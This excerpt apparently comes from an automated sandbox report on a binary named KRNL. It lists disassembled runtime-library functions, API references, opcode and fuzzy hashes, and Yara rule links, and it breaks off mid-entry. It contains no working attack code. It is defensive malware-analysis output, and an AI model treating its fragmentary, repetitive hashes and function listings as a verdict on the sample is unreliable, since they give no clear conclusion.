                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3457337e6bd9e202d0c574e7eecf980bc0936f312b3d79a21c6e5436919e4d71
                                                                                                                                                                                                                                                          • Instruction ID: 8cf2d19bb5e8a2ad2b5e2a5776c6eaf0bd55c6c08583ad03aab2436cacb0edfe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3457337e6bd9e202d0c574e7eecf980bc0936f312b3d79a21c6e5436919e4d71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB1E1B4A04A49EFDB11DFA8D840BBEBBF1BF49304F148258E900972C2C7799941CFA4
                                                                                                                                                                                                                                                          Function 006E9B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9C97
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CA8
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CBC
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CDD
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CEE
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9D06
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2134207285-0
                                                                                                                                                                                                                                                          • Opcode ID: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction ID: 9320267bc15885780e24f8158d8190e29c47d907da69b4f21adf2af9b52efddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE41F5B0902780CBDB30AB6289067EFB7F6AF45724F28062DD57A163D1D3316904CB66
                                                                                                                                                                                                                                                          Function 006FACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,006FACDE,006F0760,006EB77F,AB1687B8,?,?,?,?,0070BFCA,000000FF), ref: 006FACF5
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FAD03
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FAD1C
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,006FACDE,006F0760,006EB77F,AB1687B8,?,?,?,?,0070BFCA,000000FF), ref: 006FAD6E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: fb94df17d09db5008362fb7756a95dcf03ab174f7653229126aa1ec9fada4ca0
                                                                                                                                                                                                                                                          • Instruction ID: ff97f8ed4bc408cf8d7c3fc3b2ad54830fc3a6f8cf20cc3f292b8784dfa646e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb94df17d09db5008362fb7756a95dcf03ab174f7653229126aa1ec9fada4ca0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01F57220A619DEE7242AB87C498B626C6EF06B75720833AF714457F0EF1558039555
                                                                                                                                                                                                                                                          Function 006FB56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006FB68D
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006FB906
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 4b2818c0ed580a6db19a5445873140bceaf561ac419b547d37c9f69b7fee7d31
                                                                                                                                                                                                                                                          • Instruction ID: ac47d030443d3a466e2c7c2c504038bfed802992aabd5bc1c8715c08c71212a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b2818c0ed580a6db19a5445873140bceaf561ac419b547d37c9f69b7fee7d31
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79B1677580020DEFCF14DFA4C8819BEBBBABF44310B14555AEA25AB212D731DA51CF96
                                                                                                                                                                                                                                                          Function 006EBE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EBF44
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EC028
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                          • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                          • Opcode ID: b6c5d81c810cc1274d6920e846810f5cf096aca96933b96eae19ce6a35613a7c
                                                                                                                                                                                                                                                          • Instruction ID: 80d1008a47589e5fec60db716430fb67a448bf0da8ac3d053a67c16db8a92f1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c5d81c810cc1274d6920e846810f5cf096aca96933b96eae19ce6a35613a7c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1241CE34902388DFCF28DF6AD945AAFB7B6BF44300B68906DE045A7742C734AA05CF55
                                                                                                                                                                                                                                                          Function 006F55C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB1687B8,?,?,00000000,0070BE94,000000FF,?,006F5685,00000002,?,006F5721,006F8396), ref: 006F55F9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F560B
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0070BE94,000000FF,?,006F5685,00000002,?,006F5721,006F8396), ref: 006F562D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
                                                                                                                                                                                                                                                          • Instruction ID: 3bab834c2e031fdaa1c95afc75f8726b03673c70e9459ab87e9cfc4dc0d0f2c0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E016771540A19EFDB118F58DC09BEEBBB9FB04B15F018525F921E22E0DB789D00CA94
                                                                                                                                                                                                                                                          Function 006FD6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD76F
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD838
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD89F
                                                                                                                                                                                                                                                            • Part of subcall function 006FBF11: RtlAllocateHeap.NTDLL(00000000,006FDF35,?,?,006FDF35,00000220,?,00000000,?), ref: 006FBF43
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8B2
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1423051803-0
                                                                                                                                                                                                                                                          • Opcode ID: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
                                                                                                                                                                                                                                                          • Instruction ID: 2c19cfb39e9bada7a974c9f23f455b40d615caffa5220fc26033e33459bd7f10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5351B57260020EAFEB215F65CC81EFF7AABEF44790B15012CFE14D6251EB71EC1196A4
                                                                                                                                                                                                                                                          Function 006EEFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006EF005
                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(006E8E38), ref: 006EF024
                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF052
                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0AD
                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(006E8E38,006EA2F0,?), ref: 006EF0C4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 66001078-0
                                                                                                                                                                                                                                                          • Opcode ID: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
                                                                                                                                                                                                                                                          • Instruction ID: 3d59a0fc825efad6828327974411dec3a529b87ea031430514ec7b8493255d30
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c69e2b5fc7cb5f103d12c6b8410b1aaa5a8b962232d7514bdf93b1040595f4f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0416D3160278ADBCB20CF66C4919EAB3B6FF04310B10897AE44687641E770F985CB55
                                                                                                                                                                                                                                                          Function 006ED4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006ED4C9
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006ED4D3
                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 006ED4EA
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 006ED50D
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006ED544
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3716348337-0
                                                                                                                                                                                                                                                          • Opcode ID: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
                                                                                                                                                                                                                                                          • Instruction ID: b4d0c4642763be2541857f7fb966bd011c441fa72e0ed29835dea9242395db61
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efb3d3b4c44e2fdb652f793045497e22f6264bb669f01c4efb36290e2c90b34f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A01A1319023959FCB02EBA98945AFD7773AF84724F14411DE415AB3C2DF349E018785
                                                                                                                                                                                                                                                          Function 006EADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006EADDE
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006EADE9
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006EAE57
                                                                                                                                                                                                                                                            • Part of subcall function 006EACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006EACC2
                                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 006EAE04
                                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 006EAE1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                          • Opcode ID: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
                                                                                                                                                                                                                                                          • Instruction ID: bea54adbb77d3ef6881b3b8552a59e70f5b5c58c962d983dcecec3a1bc0db0df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8659ef3c6f157f55fbd69b1e35f7ebce03cd11ea150a065e63acb30f1ebe2a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01B1756023909BCB06EFA5D8555BD3762FF84750B15802DE9065B3C1CF78BE42CB8A
                                                                                                                                                                                                                                                          Function 00700976 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006F5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00700A35
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006F5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00700A6C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                          • String ID: ,Kq$utf8
                                                                                                                                                                                                                                                          • API String ID: 943130320-1836333774
                                                                                                                                                                                                                                                          • Opcode ID: bc3e0e0c270f296bffe0e1446ce1f6b543816833ca692cc9a935f245fec58890
                                                                                                                                                                                                                                                          • Instruction ID: c37cdb41688daf3ab7a874337e7a83621760015f6da798e0f364c14415c5dad7
